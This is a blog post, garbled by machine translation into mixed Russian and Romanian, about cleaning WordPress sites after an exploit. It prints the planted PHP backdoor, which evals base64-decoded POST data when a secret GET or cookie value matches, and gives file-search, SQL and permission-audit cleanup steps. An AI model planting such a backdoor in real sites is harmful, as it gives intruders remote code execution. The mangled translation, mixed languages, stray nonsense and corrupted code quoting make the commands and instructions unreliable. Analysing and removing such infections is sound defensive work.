Прежде чем прочитать этот пост, вы должны увидеть Пост здесь, чтобы что -то понять. :)
Я обнаружил в нескольких файлах блогов на stealthsetts.com, коды, похожие на приведенные ниже, которые появились в результате вируса с Эксплуал de wordpress.:
<? Php if ($ _ Get [‘573abcb060974771’] ==”8e96d1b4b674e1d2″) {eval (base64_decode ($ _ post [‘file '])); Выход; }?>
и
<? Php if ($ _ cookie [’’ 44E827f9fbeca184′] ==”5CD3C94B4B1C57EA”) {eval (base64_decode ($ _ post [‘file '])); Выход; }?>
В вышеупомянутом случае речь идет о файле Xmlrpc.php принадлежащий Сонный, но в грип На сервере вы можете видеть, что в источниках довольно много кодов в своем роде.
Очистка зараженных файлов:
OOOOKKKKYOUAK
1. Лучшее решение, после того как это сделано резервная копияи чистая база данных - это его УДАЛИТЬ файлы WordPress (puteti pastra wp-config.php si fisierele care nu tin strict de platforma wp, dupa ce sunt atent verificate) de pe server si sa faceti upload la cele originale din versiunea 2.5.1 (cu ocazia asta faceti si un upgrade de versiune wp :) ): http://wordpress.org/download/ . Stergeti inclusiv fisierele temei, daca nu aveti incredere ca puteti face o verificare atenta a lor.
Se vede ca au fost afectate si fisiere ale temelor care nu au fost folosite niciodata pe blog si simpla schimbare a temei, nu rezolva aceasta problema.
./andreea/wp-content/themes/default/index.php:<? Php if ($ _ cookie [’’ 44E827f9fbeca184′] ==”5CD3C94B4B1C57EA”) {eval (base64_decode ($ _ post [‘file '])); Выход; }?><?php get_header(); ?>
2. Cautati si stergeti toate fisierele care contin : *_new.php, *_old.php, *.jpgg, *.giff, *.pngg si fisierul wp-info.txt, daca exista.
find . -name “*_new.php”
find . -name “*_old.php”
find . -name “*.jpgg”
find . -name “*_giff”
find . -name “*_pngg”
find . -name “wp-info.txt”
3. in /tmp Поиск и удаление папки, как tmpywbzt2
SQL чистящий :
1. В таблице таблицы wp_options Посмотрите, существуете ли вы, и удалите линии: Internal_links_cacheВ RIS_F541B3ABD05E7962FCAB37737F40FAD8 и WordPress_optionsПолем
2. Также в WP_OPTION Active_plugins И удалить, если он существует, плагин, который заканчивается в одном из расширений *_new.php, *_old.php, *.jpgg, *.giff, *.pngg или если есть еще одно подозрительное расширение, внимательно проверяйте.
3. В таблице wp_users, посмотрите, есть ли пользователь, которому рядом с ним нечего писать, на столбце user_nicenameПолем Удалите этого пользователя, но сохраните номер в столбце ID. Этот пользователь можно использовать «WordPress» как user_login И, похоже, это создано в 00:00 0000-00-00.
4. Перейти к столу WP_USERMETA и удалите все строки, которые принадлежат идентификатору выше.
После того, как вы сделали эту очистку SQL, деактивируйте, а затем активируйте какой -то плагин. (в блоге -> Приборная панель -> Плагины)
Северная защита сервера:
1. Посмотрите, какие каталоги и файлы »Записывается"(CHMOD 777) и попытаться надеть их chmod который больше не позволит им писать с любого уровня. (CHMOD 644, например)
находить . -Перм -2 –LS
2. Посмотрите, какие файлы установили бит юг или кататься на коньках Полем Если вы не используете эти файлы, наложенные на них chmod 0 или удалить пакет, который содержит. Они очень опасны, потому что они выступают с привилегиями »группа"Или"корень«И не с привилегиями обычного пользователя, который выполняет этот файл.
Найти / -type f -perm -04000 -ls
Найти / -type f -perm -02000 -ls
3. Проверьте, какие порты открыты, и попробуйте закрыть или закрепить те, которые не используются.
NetStat -an | Список сцепления
Это все. Я вижу это Некоторые блоги банат По поиску Google, а другие говорят: «Хорошо, сделал их !!!» Полем Ну, они бы сделали их ... но что ты скажешь, если бы Google начнет деньги все сайты кто это делает SE спам и троянцы (Trojan.clicker.html) в файлах cookie?
1 думал о "WordPress Exploit – Очистка файлов вируса, SQL и безопасности сервера.”